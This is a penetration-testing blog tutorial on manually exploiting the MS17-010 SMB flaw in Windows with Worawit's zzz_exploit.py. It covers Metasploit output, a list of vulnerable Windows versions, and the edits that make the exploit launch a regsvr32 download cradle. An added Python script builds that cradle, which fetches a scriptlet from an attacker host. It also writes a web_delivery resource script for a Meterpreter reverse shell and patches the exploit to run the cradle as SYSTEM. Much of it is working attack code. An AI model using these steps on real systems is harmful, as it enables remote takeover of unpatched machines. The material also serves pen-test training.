With MS17-010, it's very easy to hit a box and get SYSTEM, and it has made pen-testers' lives much, much easier. Searching for MS17-010 in Metasploit displays the following:
```
msf > search ms17

Matching Modules
================

   Name                                                   Disclosure Date  Rank     Check  Description
   ----                                                   ---------------  ----     -----  -----------
   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```
The search returns a lot of modules (the mssql entries are unrelated hits; the MS17-010 ones are the smb modules). The exploit modules and the payloads they drop have had their signatures hammered and will most likely be flagged by any AV. And if the exploitation is happening in the context of the OSCP, the exam rules do not allow you to lean on these modules anyway.
To avoid relying on them, Worawit wrote a proof-of-concept in Python, and this post walks through the small edits needed to drive it with your own payload.
As of writing this, the script is able to exploit:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
Worawit put out a GitHub repository full of proof-of-concept code and useful scripts. The noteworthy ones are checker.py and zzz_exploit.py. Run checker.py first: it confirms whether the target is vulnerable and reports which named pipes it will let you open. zzz_exploit.py needs one such accessible pipe to work; against older targets an anonymous (null-session) connection is often enough, while newer targets usually require valid credentials, which are set in the USERNAME and PASSWORD variables near the top of both scripts.
zzz_exploit.py is the script that will be modified slightly to enable more manual exploitation of MS17-010 and should allow for the exploitation of the previously mentioned Windows variants.
All credit goes to Korey McKinley and his article; small adjustments were made to this to suit my current setup.
The easiest way to generate the callback payload with Metasploit is to use the exploit/multi/script/web_delivery module. This module has multiple methods (targets) for calling back to the attacker machine; this post will stick to regsvr32.
My Metasploit configuration looked like this:
This should produce an execution cradle that looks like this:
Armed with the regsvr32 execution cradle, clone Worawit's repo. Open up zzz_exploit.py and move to line 972, or search for the function whose first few lines create pwned.txt (the line number may differ in later revisions of the script). Those first few lines create a pwned.txt in C:\ purely as a proof of execution. This isn't required, so comment out the following:
```python
print('creating file c:\\pwned.txt on the target')
tid2 = smbConn.connectTree('C$')
fid2 = smbConn.createFile(tid2, '/pwned.txt')
smbConn.closeFile(tid2, fid2)
smbConn.disconnectTree(tid2)
```
Underneath that, there is a commented-out example use of the service_exec function, which runs the given command as a service (and therefore as SYSTEM) over the SMB session the exploit has opened. Uncomment it and switch out the example command for the cradle generated by web_delivery. The function should now look similar to this:
The function now contains the execution cradle. Make sure the web_delivery handler is running, then run the script against the target (the original script is Python 2 and needs impacket installed) with:
```
python zzz_exploit.py 192.168.0.35
```
If everything went well, the output shows regsvr32 calling back, fetching the payload, and a Meterpreter session being created.
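The steps above, as an added example (my code, not from the original post or Worawit's repository): it builds the regsvr32 cradle in the shape the web_delivery Regsvr32 target prints, emits a resource script for that module, and rewrites the body of the function in zzz_exploit.py exactly as described, commenting out the pwned.txt block and swapping the example service_exec command for the cradle. The attacker address 192.168.0.10, ports 8080/4444 and the URIPATH Ub3zV are made-up sample values; the function name smb_pwn, the target index and the option names are taken from the script and module as I know them and are not stated on this page, and the sample function body below is a constructed excerpt rather than a copy of the script.

```python
#!/usr/bin/env python3
"""Added example, not code from the post or from Worawit's repository."""
import sys


def regsvr32_cradle(lhost, lport, uripath):
    """Cradle in the shape web_delivery prints for its Regsvr32 target.
    /s silent, /n skip DllRegisterServer, /u unregister, /i: hands the URL to
    scrobj.dll, which fetches and runs the .sct scriptlet from the attacker."""
    return "regsvr32 /s /n /u /i:http://%s:%d/%s.sct scrobj.dll" % (lhost, lport, uripath)


def web_delivery_rc(lhost, srvport, uripath, handler_port=4444):
    """msfconsole resource script for web_delivery. Target index 3 was Regsvr32
    at the time of writing (assumption; confirm with 'show targets'). URIPATH is
    pinned so the cradle is predictable instead of a random path."""
    return "\n".join([
        "use exploit/multi/script/web_delivery",
        "set target 3",
        "set payload windows/meterpreter/reverse_tcp",
        "set LHOST %s" % lhost,
        "set LPORT %d" % handler_port,
        "set SRVHOST %s" % lhost,
        "set SRVPORT %d" % srvport,
        "set URIPATH %s" % uripath,
        "run -j",
    ]) + "\n"


# Constructed excerpt mirroring the layout of smb_pwn in zzz_exploit.py
# (four-space indent here; the real file uses tabs, which the patcher preserves).
SAMPLE_SMB_PWN = """\
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()

    print('creating file c:\\\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

    #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
    #service_exec(conn, r'cmd /c copy c:\\pwned.txt c:\\pwned_exec.txt')
"""


def patch_smb_pwn(source, cradle):
    """Comment out the five-line pwned.txt block and replace the commented
    service_exec example with one that launches the cradle via cmd /c.
    Raises ValueError if the function does not look the way the post expects,
    so a newer script revision is not silently half-patched."""
    if "'" in cradle:
        raise ValueError("cradle must not contain a single quote (it goes inside r'...')")
    out, in_block, commented, replaced = [], False, 0, 0
    for line in source.splitlines():
        stripped = line.lstrip()
        indent = line[:len(line) - len(stripped)]
        if stripped.startswith("print(") and "pwned.txt" in stripped:
            in_block = True
        if in_block:
            out.append(indent + "#" + stripped)
            commented += 1
            if stripped.startswith("smbConn.disconnectTree("):
                in_block = False
            continue
        if stripped.startswith("#service_exec(conn,"):
            out.append(indent + "service_exec(conn, r'cmd /c %s')" % cradle)
            replaced += 1
            continue
        out.append(line)
    if commented != 5 or replaced != 1:
        raise ValueError("unexpected smb_pwn layout: commented %d lines, replaced %d"
                         % (commented, replaced))
    return "\n".join(out) + "\n"


def patch_file(path, cradle):
    """Patch zzz_exploit.py in place; returns the new contents."""
    with open(path) as fh:
        patched = patch_smb_pwn(fh.read(), cradle)
    with open(path, "w") as fh:
        fh.write(patched)
    return patched


if __name__ == "__main__":
    cradle = regsvr32_cradle("192.168.0.10", 8080, "Ub3zV")
    print(web_delivery_rc("192.168.0.10", 8080, "Ub3zV"))
    print(cradle)
    if len(sys.argv) > 1:
        patch_file(sys.argv[1], cradle)      # e.g. path to zzz_exploit.py
    else:
        print(patch_smb_pwn(SAMPLE_SMB_PWN, cradle))
```

Run it with no arguments to see the resource script, the cradle and the patched sample function; pass the path to zzz_exploit.py to edit the real file. The patcher refuses to write anything unless it finds exactly the five pwned.txt lines and one commented service_exec line, which is the check you want before firing a kernel-level exploit with a half-edited script.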
To avoid using Metasploit altogether, Shelby can be used to generate various cradles and shells.
Since writing this post, I have modified the code to allow for an easier user experience; it can be found here.
- Worawit: Twitter
- Worawit: GitHub
- Korey McKinley: Manually Exploiting MS17-010
- Regsvr32: Microsoft documentation
- Checkpoint Research: MS17-010 Analysis